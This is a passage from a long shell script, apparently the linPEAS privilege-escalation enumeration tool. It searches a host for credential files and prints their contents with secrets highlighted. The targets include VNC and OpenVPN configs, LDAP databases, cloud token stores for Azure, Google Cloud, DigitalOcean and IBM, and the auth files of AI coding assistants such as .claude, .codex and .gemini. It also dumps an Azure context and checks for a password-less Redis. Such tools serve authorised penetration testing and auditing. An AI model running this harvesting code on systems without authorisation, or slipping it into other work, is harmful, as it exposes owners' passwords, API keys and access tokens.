]; then echo_not_found "*vnc*.c*nf*"; fi; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.c.*nf.*$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,vnc.*\.c.*nf.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; 10344 if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*vnc*.ini"; fi; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,vnc.*\.ini$,${SED_RED},"; done; echo ""; 10345 if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.txt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*vnc*.txt"; fi; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.txt$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,vnc.*\.txt$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; 10346 if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*vnc*.xml"; fi; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,vnc.*\.xml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; 10347 fi 10348 10349 10350 if [ "$PSTORAGE_LDAP" ] || [ "$DEBUG" ]; then 10351 print_2title "Analyzing Ldap Files (limit 70)" 10352 echo "The password hash is from the {SSHA} to 'structural'" 10353 if ! [ "`echo \"$PSTORAGE_LDAP\" | grep -E \"ldap$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ldap"; fi; fi; printf "%s" "$PSTORAGE_LDAP" | grep -E "ldap$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,ldap$,${SED_RED},"; find "$f" -name "*.bdb" | while read ff; do ls -ld "$ff" | sed -${E} "s,.bdb,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E -i -a -o "description.*" | sort | uniq | sed -${E} "s,administrator|password|ADMINISTRATOR|PASSWORD|Password|Administrator,${SED_RED},g"; done; echo "";done; echo ""; 10354 fi 10355 10356 10357 if [ "$PSTORAGE_OPENVPN" ] || [ "$DEBUG" ]; then 10358 print_2title "Analyzing OpenVPN Files (limit 70)" 10359 if ! [ "`echo \"$PSTORAGE_OPENVPN\" | grep -E \"\.ovpn$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.ovpn"; fi; fi; printf "%s" "$PSTORAGE_OPENVPN" | grep -E "\.ovpn$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.ovpn$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "auth-user-pass.+" | sed -${E} "s,auth-user-pass.+,${SED_RED},g"; done; echo ""; 10360 fi 10361 10362 10363 if [ "$PSTORAGE_CLOUD_CREDENTIALS" ] || [ "$DEBUG" ]; then 10364 print_2title "Analyzing Cloud Credentials Files (limit 70)" 10365 (pwsh -Command "Save-AzContext -Path /tmp/az-context3489ht.json" && cat /tmp/az-context3489ht.json && rm /tmp/az-context3489ht.json) || echo_not_found "pwsh" 10366 if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"credentials\.db$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "credentials.db"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "credentials\.db$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,credentials\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; 10367 if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"legacy_credentials\.db$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "legacy_credentials.db"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "legacy_credentials\.db$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,legacy_credentials\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; 10368 if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"adc\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "adc.json"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "adc\.json$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,adc\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; 10369 if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"\.boto$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".boto"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "\.boto$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.boto$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; 10370 if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"\.credentials\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".credentials.json"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "\.credentials\.json$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.credentials\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; 10371 if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"firebase-tools\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "firebase-tools.json"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "firebase-tools\.json$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,firebase-tools\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,id_token.*|access_token.*|refresh_token.*,${SED_RED},g"; done; echo ""; 10372 if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"access_tokens\.db$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "access_tokens.db"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "access_tokens\.db$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,access_tokens\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; 10373 if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"access_tokens\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "access_tokens.json"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "access_tokens\.json$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,access_tokens\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; 10374 if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"accessTokens\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "accessTokens.json"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "accessTokens\.json$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,accessTokens\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; 10375 if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"gcloud$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "gcloud"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "gcloud$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,gcloud$,${SED_RED},"; find "$f" -name "*" | while read ff; do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "b'authorization'.*" | sed -${E} "s,b'authorization'.*,${SED_RED},g"; done; echo "";done; echo ""; 10376 if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"legacy_credentials$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "legacy_credentials"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "legacy_credentials$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,legacy_credentials$,${SED_RED},"; find "$f" -name "*" | while read ff; do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,refresh_token.*|client_secret,${SED_RED},g"; done; echo "";done; echo ""; 10377 if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"azureProfile\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "azureProfile.json"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "azureProfile\.json$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,azureProfile\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; 10378 if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"TokenCache\.dat$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "TokenCache.dat"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "TokenCache\.dat$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,TokenCache\.dat$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; 10379 if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"AzureRMContext\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "AzureRMContext.json"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "AzureRMContext\.json$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,AzureRMContext\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,Id.*|Credential.*,${SED_RED},g"; done; echo ""; 10380 if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"clouds\.config$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "clouds.config"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "clouds\.config$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,clouds\.config$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; 10381 if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"service_principal_entries\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "service_principal_entries.json"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "service_principal_entries\.json$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,service_principal_entries\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; 10382 if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"msal_token_cache\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "msal_token_cache.json"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "msal_token_cache\.json$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,msal_token_cache\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; 10383 if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"msal_http_cache\.bin$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "msal_http_cache.bin"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "msal_http_cache\.bin$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,msal_http_cache\.bin$,${SED_RED},"; done; echo ""; 10384 if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"service_principal_entries\.bin$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "service_principal_entries.bin"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "service_principal_entries\.bin$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,service_principal_entries\.bin$,${SED_RED},"; done; echo ""; 10385 if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"msal_token_cache\.bin$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "msal_token_cache.bin"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "msal_token_cache\.bin$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,msal_token_cache\.bin$,${SED_RED},"; done; echo ""; 10386 if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"ErrorRecords$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ErrorRecords"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "ErrorRecords$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,ErrorRecords$,${SED_RED},"; done; echo ""; 10387 if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"TokenCache\.dat$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "TokenCache.dat"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "TokenCache\.dat$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,TokenCache\.dat$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; 10388 if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"\.bluemix$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".bluemix"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "\.bluemix$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.bluemix$,${SED_RED},"; find "$f" -name "config.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; 10389 if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"doctl$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "doctl"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "doctl$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,doctl$,${SED_RED},"; find "$f" -name "config.yaml" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.yaml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "access-token.*" | sed -${E} "s,access-token.*,${SED_RED},g"; done; echo "";done; echo ""; 10390 if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"Google Cloud Directory Sync$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "Google Cloud Directory Sync"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "Google Cloud Directory Sync$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,Google Cloud Directory Sync$,${SED_RED},"; find "$f" -name "*.xml" | while read ff; do ls -ld "$ff" | sed -${E} "s,.xml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,oAuth2RefreshToken.*|authCredentialsEncrypted.*,${SED_RED},g"; done; echo "";done; echo ""; 10391 if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"Google Password Sync$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "Google Password Sync"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "Google Password Sync$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,Google Password Sync$,${SED_RED},"; find "$f" -name "*.xml" | while read ff; do ls -ld "$ff" | sed -${E} "s,.xml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,baseDN.*|authorizeUsername.*,${SED_RED},g"; done; echo "";done; echo ""; 10392 fi 10393 10394 10395 if [ "$PSTORAGE_AI_CODING_ASSISTANTS" ] || [ "$DEBUG" ]; then 10396 print_2title "Analyzing AI Coding Assistants Files (limit 70)" 10397 if ! [ "`echo \"$PSTORAGE_AI_CODING_ASSISTANTS\" | grep -E \"\.codex$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".codex"; fi; fi; printf "%s" "$PSTORAGE_AI_CODING_ASSISTANTS" | grep -E "\.codex$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.codex$,${SED_RED},"; find "$f" -name "auth.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,auth.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,access_token|refresh_token|id_token|OPENAI_API_KEY|api_key|auth_mode,${SED_RED},g"; done; echo "";find "$f" -name "config.toml" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.toml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,OPENAI_API_KEY|api_key|auth_mode|model|profile,${SED_RED},g"; done; echo "";done; echo ""; 10398 if ! [ "`echo \"$PSTORAGE_AI_CODING_ASSISTANTS\" | grep -E \"\.claude$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".claude"; fi; fi; printf "%s" "$PSTORAGE_AI_CODING_ASSISTANTS" | grep -E "\.claude$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.claude$,${SED_RED},"; find "$f" -name "settings.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,settings.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,apiKeyHelper|ANTHROPIC_API_KEY|ANTHROPIC_AUTH_TOKEN|Authorization|Bearer|token|secret|mcpServers,${SED_RED},g"; done; echo "";find "$f" -name "settings.local.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,settings.local.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,apiKeyHelper|ANTHROPIC_API_KEY|ANTHROPIC_AUTH_TOKEN|Authorization|Bearer|token|secret|mcpServers,${SED_RED},g"; done; echo "";done; echo ""; 10399 if ! [ "`echo \"$PSTORAGE_AI_CODING_ASSISTANTS\" | grep -E \"\.claude\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".claude.json"; fi; fi; printf "%s" "$PSTORAGE_AI_CODING_ASSISTANTS" | grep -E "\.claude\.json$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.claude\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,auth|token|bearer|session|oauth|api[_-]?key,${SED_RED},g"; done; echo ""; 10400 if ! [ "`echo \"$PSTORAGE_AI_CODING_ASSISTANTS\" | grep -E \"\.gemini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".gemini"; fi; fi; printf "%s" "$PSTORAGE_AI_CODING_ASSISTANTS" | grep -E "\.gemini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.gemini$,${SED_RED},"; find "$f" -name "settings.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,settings.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,GEMINI_API_KEY|GOOGLE_API_KEY|access_token|refresh_token|oauth|client_secret|Authorization|Bearer|headers|mcpServers,${SED_RED},g"; done; echo "";find "$f" -name "oauth_creds.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,oauth_creds.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,access_token|refresh_token|id_token|token_type|scope|client_id,${SED_RED},g"; done; echo "";done; echo ""; 10401 if ! [ "`echo \"$PSTORAGE_AI_CODING_ASSISTANTS\" | grep -E \"\.cursor$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".cursor"; fi; fi; printf "%s" "$PSTORAGE_AI_CODING_ASSISTANTS" | grep -E "\.cursor$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.cursor$,${SED_RED},"; find "$f" -name "mcp.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,mcp.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,Authorization|Bearer|token|api[_-]?key|secret|headers|env,${SED_RED},g"; done; echo "";done; echo ""; 10402 if ! [ "`echo \"$PSTORAGE_AI_CODING_ASSISTANTS\" | grep -E \"\.mcp\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".mcp.json"; fi; fi; printf "%s" "$PSTORAGE_AI_CODING_ASSISTANTS" | grep -E "\.mcp\.json$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.mcp\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,Authorization|Bearer|token|api[_-]?key|secret|headers|env,${SED_RED},g"; done; echo ""; 10403 if ! [ "`echo \"$PSTORAGE_AI_CODING_ASSISTANTS\" | grep -E \"gh$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "gh"; fi; fi; printf "%s" "$PSTORAGE_AI_CODING_ASSISTANTS" | grep -E "gh$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,gh$,${SED_RED},"; find "$f" -name "hosts.yml" | while read ff; do ls -ld "$ff" | sed -${E} "s,hosts.yml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,oauth_token|user:|oauth,${SED_RED},g"; done; echo "";done; echo ""; 10404 if ! [ "`echo \"$PSTORAGE_AI_CODING_ASSISTANTS\" | grep -E \"state\.vscdb$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "state.vscdb"; fi; fi; printf "%s" "$PSTORAGE_AI_CODING_ASSISTANTS" | grep -E "state\.vscdb$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,state\.vscdb$,${SED_RED},"; done; echo ""; 10405 if ! [ "`echo \"$PSTORAGE_AI_CODING_ASSISTANTS\" | grep -E \"state\.vscdb\.backup$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "state.vscdb.backup"; fi; fi; printf "%s" "$PSTORAGE_AI_CODING_ASSISTANTS" | grep -E "state\.vscdb\.backup$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,state\.vscdb\.backup$,${SED_RED},"; done; echo ""; 10406 if ! [ "`echo \"$PSTORAGE_AI_CODING_ASSISTANTS\" | grep -E \"storage\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "storage.json"; fi; fi; printf "%s" "$PSTORAGE_AI_CODING_ASSISTANTS" | grep -E "storage\.json$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,storage\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,github\.copilot|copilot|cursor|openai|anthropic|gemini|token|auth,${SED_RED},g"; done; echo ""; 10407 fi 10408 10409 10410 if [ "$PSTORAGE_ROAD_RECON" ] || [ "$DEBUG" ]; then 10411 print_2title "Analyzing Road Recon Files (limit 70)" 10412 if ! [ "`echo \"$PSTORAGE_ROAD_RECON\" | grep -E \"\.roadtools_auth$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".roadtools_auth"; fi; fi; printf "%s" "$PSTORAGE_ROAD_RECON" | grep -E "\.roadtools_auth$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.roadtools_auth$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,accessToken.*,${SED_RED},g"; done; echo ""; 10413 fi 10414 10415 10416 if [ "$PSTORAGE_KIBANA" ] || [ "$DEBUG" ]; then 10417 print_2title "Analyzing Kibana Files (limit 70)" 10418 if ! [ "`echo \"$PSTORAGE_KIBANA\" | grep -E \"kibana\.y.*ml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "kibana.y*ml"; fi; fi; printf "%s" "$PSTORAGE_KIBANA" | grep -E "kibana\.y.*ml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,kibana\.y.*ml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#|^[[:space:]]*$" | sed -${E} "s,username|password|host|port|elasticsearch|ssl,${SED_RED},g"; done; echo ""; 10419 fi 10420 10421 10422 if [ "$PSTORAGE_GRAFANA" ] || [ "$DEBUG" ]; then 10423 print_2title "Analyzing Grafana Files (limit 70)" 10424 if ! [ "`echo \"$PSTORAGE_GRAFANA\" | grep -E \"grafana\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "grafana.ini"; fi; fi; printf "%s" "$PSTORAGE_GRAFANA" | grep -E "grafana\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,grafana\.ini$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#|^;" | sed -${E} "s,admin.*|username.*|password:*|secret.*,${SED_RED},g"; done; echo ""; 10425 fi 10426 10427 10428 if [ "$PSTORAGE_KNOCKD" ] || [ "$DEBUG" ]; then 10429 print_2title "Analyzing Knockd Files (limit 70)" 10430 if ! [ "`echo \"$PSTORAGE_KNOCKD\" | grep -E \"knockd.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*knockd*"; fi; fi; printf "%s" "$PSTORAGE_KNOCKD" | grep -E "knockd.*$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,knockd.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; 10431 fi 10432 10433 10434 if [ "$PSTORAGE_ELASTICSEARCH" ] || [ "$DEBUG" ]; then 10435 print_2title "Analyzing Elasticsearch Files (limit 70)" 10436 echo "The version is $(curl -X GET '127.0.0.1:9200' 2>/dev/null | grep number | cut -d ':' -f 2)" 10437 if ! [ "`echo \"$PSTORAGE_ELASTICSEARCH\" | grep -E \"elasticsearch\.y.*ml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "elasticsearch.y*ml"; fi; fi; printf "%s" "$PSTORAGE_ELASTICSEARCH" | grep -E "elasticsearch\.y.*ml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,elasticsearch\.y.*ml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "path.data|path.logs|cluster.name|node.name|network.host|discovery.zen.ping.unicast.hosts" | grep -Ev "\W+\#|^#"; done; echo ""; 10438 fi 10439 10440 10441 if [ "$PSTORAGE_COUCHDB" ] || [ "$DEBUG" ]; then 10442 print_2title "Analyzing CouchDB Files (limit 70)" 10443 if ! [ "`echo \"$PSTORAGE_COUCHDB\" | grep -E \"couchdb$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "couchdb"; fi; fi; printf "%s" "$PSTORAGE_COUCHDB" | grep -E "couchdb$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,couchdb$,${SED_RED},"; find "$f" -name "local.ini" | while read ff; do ls -ld "$ff" | sed -${E} "s,local.ini,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^;" | sed -${E} "s,admin.*|password.*|cert_file.*|key_file.*|hashed.*|pbkdf2.*,${SED_RED},g"; done; echo "";done; echo ""; 10444 fi 10445 10446 10447 if [ "$PSTORAGE_REDIS" ] || [ "$DEBUG" ]; then 10448 print_2title "Analyzing Redis Files (limit 70)" 10449 ( redis-server --version || echo_not_found "redis-server") 2>/dev/null 10450 redis_info="$(if [ "$TIMEOUT" ]; then $TIMEOUT 2 redis-cli INFO 2>/dev/null; else redis-cli INFO 2>/dev/null; fi)"; if [ "$redis_info" ] && ! echo "$redis_info" | grep -i NOAUTH; then echo "Redis isn't password protected" | sed -${E} "s,.*,${SED_RED},"; fi 10451 if ! [ "`echo \"$PSTORAGE_REDIS\" | grep -E \"redis\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "redis.conf"; fi; fi; printf "%s" "$PSTORAGE_REDIS" | grep -E "redis\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,redis\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,masterauth.*|requirepass.*|rename-command.*|protected-mode.*no,${SED_RED},g"; done; echo ""; 10452 fi 10453 10454 10455 if [ "$PSTORAGE_MOSQUITTO" ] || [ "$DEBUG" ]; then 10456 print_2title "Analyzing Mosquitto Files (limit 